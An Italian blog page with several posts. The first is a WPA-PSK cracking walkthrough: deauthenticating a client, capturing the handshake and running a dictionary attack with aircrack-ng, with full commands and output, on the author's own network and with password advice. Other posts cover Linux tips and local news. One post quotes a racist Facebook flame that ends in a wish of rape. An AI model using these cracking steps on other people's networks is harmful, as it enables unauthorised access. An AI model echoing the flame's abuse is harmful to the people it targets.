Cracking di reti WIFI protette con WPA-PSK

La sicurezza delle WLAN basate su WPA-PSK in questo momento dipende molto dalla lunghezza della password. Con un portatile equipaggiato con Linux (Ubuntu 9.04 Jaunty Jackalope) e gli opportuni tools vi mostrerò come trovare la password di una rete protetta con WPA-PSK.
Per fare questo utilizzeremo due programmi: aircrack e kismet. Aircrack è un pacchetto di programmi che permettono di crackare chiavi WEP e WPA, kismet invece ci permette di sniffare il traffico WIFI nell'aria.
Cominciamo installando i programmi.

root@argo:~# apt-get install aircrack-ng kismet

Ora la vostra linuxbox è pronta per cominciare. Mettetevi comodi e facciamo un rapido controllo delle reti WIFI disponibili nei dintorni:

root@argo:~# iwlist wlan0 scanning

wlan0 Scan completed :
Cell 01 - Address: 00:19:5B:54:C0:68
ESSID:"default"
Mode:Master
Channel:6
Frequency:2.437 GHz (Channel 6)
Quality=99/100 Signal level:-24 dBm Noise level=-81 dBm
Encryption key:on
IE: Unknown: 000764656661756C74
IE: Unknown: 010882848B960C121824
IE: Unknown: 030106
IE: Unknown: 2A0100
IE: Unknown: 32043048606C
IE: WPA Version 1
Group Cipher : TKIP
Pairwise Ciphers (1) : TKIP
Authentication Suites (1) : PSK
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
48 Mb/s; 54 Mb/s
Extra:tsf=000000000eadcd9b
Extra: Last beacon: 200ms ago

La rete "default" è una wlan che ho approntato ad hoc per questo esempio, con un mio router e un mio access point. Non sto crackando la rete a nessuno, anche se potrei farlo volendo. :-)
Impostiamo la scheda WIFI in modalità "monitor". Questa modalità ci permetterà di sniffare le onde radio nell'etere e di analizzarle. Con questo comando vengono anche controllati i processi che potrebbero interferire durante le operazioni.

root@argo:~# airmon-ng start wifi0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
2722 NetworkManager
2745 wpa_supplicant


Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]

Sono stati trovati due processi, NetworkManager e wpa_supplicant, che potrebbero dar fastidio. Airmon ha una funzione per killare questi processi.

root@argo:~# airmon-ng check kill

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
2722 NetworkManager
2745 wpa_supplicant
Killing all those processes...

Controlliamo quindi che tutto sia andato a buon fine, facciamo un check e riabilitiamo l'interfaccia.

root@argo:~# airmon-ng check
root@argo:~# airmon-ng start wifi0


Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]

root@argo:~# airmon-ng


Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]

Il comando airmon-ng senza parametri ci mostra le interfacce abilitate, e ci conferma che la wlan0 è correttamente impostata.
Mettiamoci quindi a sniffare l'etere in cerca di informazioni sulla nostra rete.

root@argo:~# airodump-ng wlan0

CH 2 ][ BAT: 1 hour 17 mins ][ Elapsed: 12 s ][ 2009-07-30 21:05

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:54:C0:68 -61 85 0 0 6 54 WPA TKIP PSK default

BSSID STATION PWR Rate Lost Packets Probes

Troviamo l'access point "default" attivo sul canale 6, viene mostrato il MAC address e un altro po' di informazioni. In una condizione normale potrebbe capitare di trovare più reti disponibili, e client connessi alle varie WLAN. Mettiamo quindi un filtro sul MAC address della nostra WLAN e aspettiamo che qualcuno si connetta. Tutti i pacchetti da qui in avanti verranno raccolti in file per essere successivamente analizzati.

root@argo:/home/tsbrego/aircrack# airodump-ng -c 6 -w psk --bssid 00:19:5B:54:C0:68 wlan0


CH 6 ][ BAT: 1 hour 15 mins ][ Elapsed: 4 s ][ 2009-07-30 21:16

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:54:C0:68 -25 100 47 40 5 6 54 WPA TKIP PSK default

BSSID STATION PWR Rate Lost Packets Probes

00:19:5B:54:C0:68 00:16:6F:4F:A5:D0 -63 54 -48 1536 75

Troviamo finalmente un client collegato alla rete (grazie Enea!). Apriamo quindi una nuova shell e, con aireplay, mandiamo dei pacchetti di deautenticazione al client, il quale si disconnetterà e tenterà di ricollegarsi alla rete. E' qui che verrà passata, crittografata, la password di accesso alla rete e sono questi i pacchetti che ci interessano per i nostri scopi.

root@argo:~# aireplay-ng -0 3 -a 00:19:5B:54:C0:68 -c 00:16:6F:4F:A5:D0 wlan0
21:18:22 Waiting for beacon frame (BSSID: 00:19:5B:54:C0:68) on channel 6
21:18:23 Sending 64 directed DeAuth. STMAC: [00:16:6F:4F:A5:D0] [ 0| 2 ACKs]
21:18:23 Sending 64 directed DeAuth. STMAC: [00:16:6F:4F:A5:D0] [ 0| 4 ACKs]
21:18:24 Sending 64 directed DeAuth. STMAC: [00:16:6F:4F:A5:D0] [ 0| 2 ACKs]

Tra i file con i dati raccolti quello che ci interessa è psk-01.cap. Prendiamo il nostro fidato file dizionario.txt e mettiamoci a crackare la password WPA con la forza bruta.

root@argo:/home/tsbrego/aircrack# aircrack-ng -w dizionario.txt -b 00:19:5B:54:C0:68 psk-01.cap



Aircrack-ng 1.0 rc3


[00:00:00] 4 keys tested (39.33 k/s)


KEY FOUND! [ p4ssw0rd ]


Master Key : 3A 89 42 2A 28 90 4C A7 40 27 E4 77 D4 8A 60 DF
87 76 3B B0 E5 10 90 0F 7A 62 6D A1 89 EC AA 4F

Transient Key : E2 F4 80 2F 01 E1 99 21 8D AA 71 F1 61 B1 43 42
36 F8 A5 8A CE 58 D8 94 5B 03 95 F4 12 E1 CC 01
FE 1C 76 AD F3 CC C7 4C CD 7F 7C 0B 95 7E AF 91
84 C3 C9 53 4E B3 47 32 D1 37 C3 C9 82 AE 41 BB

EAPOL HMAC : D4 D8 8F 62 93 84 FD 97 49 28 76 A7 98 B9 A0 1D

Et voilà. Password trovata: p4ssw0rd.
E' chiaro che l'unico punto debole di questo sistema, per ora, è la password e che prerequisito per accedere alla rete è avere un buon dizionario che contenga tra le altre anche la password giusta. Nel mio caso, visto che conoscevo la password, mi ero preparato un file dizionario.txt che ha trovato la password al quarto tentativo.
Tenendo presente che un dizionario che contenga tutte le password da 10 caratteri con numeri e lettere solo in minuscolo pesa almeno 500 gb, se vogliamo rendere la nostra rete sicura possiamo dare una password di almeno 15 caratteri alfanumerici case sensitive e in linea di massima dormiamo sonni tranquilli. Più la password è lunga, più la rete è sicura. E' anche il caso di cambiare periodicamente la password, così da vanificare il lavoro certosino di chi vuole la nostra rete.
Tra i router out of the box forniti dai provider spicca Alice con una password di 24 caratteri, quindi molto sicura, mentre i router fastweb di default ne hanno 10.
E' chiaro che la prima cosa da fare appena acceso il proprio router wifi nuovo fiammante è andare a cambiare la password predefinita con una nuova. Ci sono gruppi di appassionati che cercano di trovare l'algoritmo per trovare la password predefinita dal produttore partendo dal MAC address, che è una informazione liberamente accessibile. Per ora sembra che nessuno ci sia riuscito, ma è meglio non rischiare.

I diritti si restringono

Un parcheggio per disabili ridotto per favorire l'accesso ad un'auto blu.
Sembra impossibile eppure è questo che è accaduto nella casa dei cittadini di Verona.
Centro della questione è il parcheggio riservato all'auto di servizio del nostro noto sindaco Flavio Tosi e un adiacente parcheggio per disabili, il quale è stato ridotto di una quarantina di centimetri affinchè le portiere dell'audi del nostro buon Flavio non cozzino accidentalmente con eventuali altre autovetture parcheggiate e per evitare che possa sporcarsi i vestiti strisciando dentro e fuori dall'auto.
Nelle foto sono ben visibili i vecchi segni azzurri, ormai sbiaditi, e si apprezza bene la sproporzione nella larghezza dei posti. Nella seconda foto è possibile anche notare la differenza di larghezza tra il posto disabili di destra e quello modificato a sinistra.
Grazie a D4r|0 per le foto e a Fastidio per il titolo.

Uso ricorsivo di a2mp3

A volte si ha la necessità di ottimizzare con a2mp3 un'intera cartella, magari con diverse sottocartelle. Il programma nativamente non ha funzionalità ricorsive, torna quindi utile questo comando:

find /home/utente/cartella -name '*.mp3' -exec a2mp3 '{}' \;

Il comando non fa altro che trovare tutti i file con estensione .mp3 che si trovano nella cartella /home/utente/cartella e, tramite il parametro -exec, passarli ad a2mp3 che li processa mettendo il prodotto finito nella cartella /home/utente/mp3tmp. Semplice.
Da tenere presente:

• Il percorso della cartella in cui eseguire la ricerca dev'essere completo, altrimenti a2mp3 darà un errore tipo "touch: cannot touch...No such file or directory".
• Il simbolo "'{}'" indica la posizione in cui verranno messi i file risultanti da passare ad a2mp3.
• Il ";" deve essere preceduto dal carattere di escape "\" altrimenti verrebbe processato come interruzione del comando find e non passato ad exec come interruzione di a2mp3.

Io non sono razzista, sono loro che sono neri!

Riporto in toto un flame nato da una massmail su facebook. Purtroppo certi pensieri sono normale amministrazione di questi tempi.

Simone Tartari
15 febbraio alle ore 16.36
Basta stupri!! difendiamo le nostre madri, sorelle, figlie, ragazze, mogli!!
riprendiamoci la dignità ITALIANA!!! fate girare!!!

Matteo Iacono
15 febbraio alle ore 16.48
Giusto bravo!
Riprendiamoci anche la dignità italiana contro i preti pedofili!
Ah no, scusa, quelli no perchè sono bianchi..
Ma va a cagare va!

Simone Tartari
15 febbraio alle ore 20.42
pensi che io non sia contro i pedofili?? che siano bianchi, neri, gialli, o rossi, preti o politici persone normali o mafiosi sempre merde allo stesso modo!! preti ancora peggio visto che dovrebbero insegnare altre cose...
non sò non vorrei essere stato frainteso...
comunque non faccio distinzioni razziali ma è un dato di fatto che questi ne combinano di peggio! una volta non si sentiva mai parlare di stupri di gruppo e per giunta su ragazze di 15 anni!

Matteo Iacono
Oggi alle 0.28
Guarda, non è neanche colpa tua..sei solo uno dei tanti ignoranti che fanno di tutta l'erba un fascio e che assorbono quello che passa in tv senza provare a pensare con la propria testa.
Se non si parla degli stupri compiuti da italiani è solo perchè fanno meno notizia di sti tempi, non certo perchè non ce ne siano. Inoltre se certe dinamiche si sviluppano più facilmente (e bada bene che ho detto più facilmente, non esclusivamente) tra gli extracomunitari è solo perchè la maggior parte di loro vive in situazioni di povertà e degrado, in un territorio che non è il loro e si sentono soli e disprezzati da qualsiasi persona che li circondi.
E tu pensi alla dignità italiana? Un'italia con i preti che abusano di un'intera scuola di sordomuti, con i mafiosi che sciolgono i bambini nell'acido, con gli ultrà che si menano a sangue negli stadi, con un premier e tutta la classe politica che se ne fregano, che rubano e si fanno le leggi a proprio favore rendendoci ridicoli agli occhi del mondo.
La tua dignità italiana fa acqua..
Salutami il tuo amico Bossi che predica i valori della famiglia e si fa venire un coccolone andando a letto con Luisa Corna.

Simone Tartari
Oggi alle 0.44
sei solo un buonista, perbenista, scommetto che sei di sinistra... ora capisco perchè la gente non vota più la sinistra... se sono tutti come te... pensa se fossero state tua madre o tua sorella... ciao ciao

Matteo Iacono
Oggi alle 18.00
Risposta senza senso, tipica del classico bifolco di paese che da ragazzino truccava i motorini e che non ha mai aperto un libro o un giornale e ora guarda il tg di Fede e crede che quella sia la realtà.
Non mandare massmail perchè su internet non sono tutti ignoranti bigotti come te.
Spero che il prossimo ad essere violentato sia tu.
Addio.

Screensaver slideshow su gnome

Visto che questa sera mi sono messo a personalizzare questo screensaver sul pc che fa da server, client, ambiente di test ed altro ancora, riporto il procedimento a futura memoria. Questo screensaver mostra a schermo uno slide show, cioè una sequenza di immagini. In particolare noi andremo a cambiare la cartella in cui lo screensaver va a cercarsi le immagini, visto che di default le cerca sotto ~/Pictures che è piuttosto scomodo ed antiestetico. Negli esempi seguenti supponiamo di voler impostare la cartella ~/Foto. Chiaramente al posto di ~/Foto possiamo usare qualsiasi percorso.
Modifichiamo il file personal-slideshow.desktop. Su debian diamo quindi il comando:

sudo vim /usr/share/gnome-screensaver/themes/personal-slideshow.desktop

mentre con ubuntu dovremo dare il comando:

sudo vim /usr/share/applications/screensavers/personal-slideshow.desktop

Nel caso il file non si trovasse nei percorsi riportati sopra, potete cercarli con i comandi:

sudo updatedb
locate personal-slideshow.desktop

Il primo aggiorna il database dei file, il secondo esegue la ricerca. Fatto questo localizziamo la riga:

Exec=slideshow --location=Pictures

e modifichiamola come segue, premendo il tasto "i" per entrare in modalità "insert":

Exec=slideshow --location=~/Foto

Premiamo quindi il tasto "esc" e diamo infine il comando ":wq" seguito da invio per salvare ed uscire.
Non ci resta che andare nel menu "Sistema > Preferenze > Salvaschermo" ed impostare come screensaver "Cartella immagini".

Suonerie Fai Da Te

Per chi è un felice possessore di un computer equipaggiato con linux c'è un tool molto semplice e veloce per farsi le suonerie per il cellulare in casa: mp3cut, in sostanza un comando shell che taglia gli mp3.
L'installazione, su sistemi debian based, è molto semplice:

sudo apt-get install poc-streamer

all'interno di questo pacchetto troveremo anche mp3cut.
Come procedere? Apriamo il nostro lettore mp3 preferito e ascoltiamo la canzone da cui vorremmo estrarre la suoneria, solitamente il ritornello.
Tenendo d'occhio il timer segnamoci il tempo di inizio e di fine del pezzo da tagliare. Ora andiamo sulla shell e utilizziamo il seguente comando:

mp3cut -o outputfile -t [hh:]mm:ss[+ms]-[hh:]mm:ss[+ms] inputfile

dove outputfile è il nome file che avrà la suoneria, hh mm ss ms sono rispettivamente ore (non credo che le userete), minuti, secondi e millisecondi di inizio e di fine del pezzo da tagliare, ed inputfile è il nome file della canzone di origine. Esempio pratico: prendiamo la canzone "Ni fu ni fa" degli Ska-P e suoniamola con un lettore mp3 qualsiasi, io mi trovo bene con vlc ma va bene qualsiasi lettore che mostri un timer con minuti e secondi. Segnamoci il minuto ed il secondo di inizio e di fine del trancio da tagliare. Nel mio caso voglio tagliare da 1:48 a 2:35.
Ora apriamo la shell e digitiamo questo comando:

mp3cut -o suoneria.mp3 -t 1:48-2:35 NiFuNiFa.mp3

Verrà così creato il file suoneria.mp3. Apriamo il solito lettore mp3 e ascoltiamo il file prodotto. A meno che non abbiate una gran fortuna dovrete limare un po' il file. Quindi è ora di lavorare sui millesimi. Qui bisogna andare un po' per tentativi finchè il taglio non è preciso, con l'esperienza ci farete la mano. Nel mio caso il taglio perfetto l'ho avuto con il comando:

mp3cut -o suoneria.mp3 -t 1:48+750-2:34+350 NiFuNiFa.mp3

Suonando il file suoneria.mp3 con vlc e la ripetizione della singola traccia il ritornello risulta tagliato bene e, ripetendosi, la fine si aggancia bene con l'inizio.
Il file prodotto va benissimo così e può essere spedito via bluetooth, via usb o come volete al cellulare e impostato come suoneria. Ma il file risultato potrebbe essere ottimizzato in modo da risparmiare spazio sul cell, che è utile specialmente per chi ha cellulari poco capienti. A tal fine utilizzeremo il tool a2mp3.
Come al solito con una semplicità disarmante per i sistemi debian installiamo a2mp3:

sudo apt-get install a2mp3

entriamo poi nella cartella in cui si trova il nostro file e diamo il seguente comando:

a2mp3 -d suoneria_opt.mp3 suoneria.mp3

e come per magia verrà creato il file suoneria_opt.mp3 ottimizzato. Mandate quest'ultimo file al cellulare ed impostatelo come suoneria. Les jeux sont fait.

Multitasking

Definizione di multitasking (tnx Ipnosis):